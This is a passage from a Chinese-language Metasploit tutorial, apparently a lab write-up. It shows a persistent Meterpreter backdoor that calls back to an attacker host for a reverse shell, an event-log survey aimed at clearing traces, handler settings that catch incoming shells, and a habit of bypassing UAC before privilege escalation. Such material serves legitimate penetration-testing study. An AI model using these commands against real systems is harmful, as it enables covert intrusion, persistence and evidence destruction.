渗透阶段接近尾声,我们留一个持久化后门(参考Metasploit 「控制持久化」权限维持):

meterpreter > run persistence -h

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

我们使用

run persistence -U -i 10 -p 4444 -r 172.16.56.1

然后就可以在别的msfconsole中开启监听,稍微等几秒钟就有shell连上来:

删除相关vbs脚本、注册表键值并结束cscript.exe进程就可删除后门。

最后,尝试一下清理痕迹的功能:

首先查看一下都有什么痕迹:

meterpreter > run event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

 Name                    Retention  Maximum Size  Records
 ----                    ---------  ------------  -------
 Application             Disabled   20971520K     940
 HardwareEvents          Disabled   20971520K     0
 Internet Explorer       Disabled   K             0
 Key Management Service  Disabled   20971520K     0
 Media Center            Disabled   8388608K      0
 Security                Disabled   20971520K     2698
 System                  Disabled   20971520K     3030
 ThinPrint Diagnostics   Disabled   K             22
 Windows PowerShell      Disabled   15728640K     321

清理:

或者:

拓展延伸

在实践的过程中接触到几篇不错的文章,这里摘录一些别人的想法和经验。

  • 生成后门时端口尽量使用4444,因为handler模块监听的许多payload监听&开放端口都为4444,这样可以省去之后很多端口设置;当然了,反过来想,如果经常设置4444,那么有经验的被攻击者也可能猜出你使用的攻击工具是msf
  • 在使用handler模块时,设置
set ExitOnSession false
exploit -j -z

这样一来,监听端口会一直在后台处于侦听状态,来一个反弹shell就连接一个。

  • 自行添加了模块后使用reload_all重新载入
  • 获取meterpreter会话后进行提权前,习惯性的先执行一下bypass UAC
  • sessions很有用,可以看一下它的选项:
msf > sessions -h
Usage: sessions [options] or sessions [id]

Active session manipulation and interaction.

OPTIONS:

    -C <opt>  Run a Meterpreter Command on the session given with -i, or all
    -K        Terminate all sessions
    -S <opt>  Row search filter.
    -c <opt>  Run a command on the session given with -i, or all
    -d        List all inactive sessions
    -h        Help banner
    -i <opt>  Interact with the supplied session ID
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -n <opt>  Name or rename a session by ID
    -q        Quiet mode
    -s <opt>  Run a script or module on the session given with -i, or all
    -t <opt>  Set a response timeout (default: 15)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List all active sessions in verbose mode
    -x        Show extended information in the session table

Many options allow specifying session ranges using commas and dashes.
For example:  sessions -s checkvm -i 1,3-5  or  sessions -k 1-2,5,6

参考Metasploit 平常『习惯』的养成

总结

到最后,手握几个shell的时候,真的很有感觉,也真的体会到了Metasploit的强大:

Metasploit将无数知识和技术集成起来,向用户提供了一个优雅的交互界面,这正是它的价值和魅力。未来可以做的是深入研究它每一步背后的原理,如getsystem等。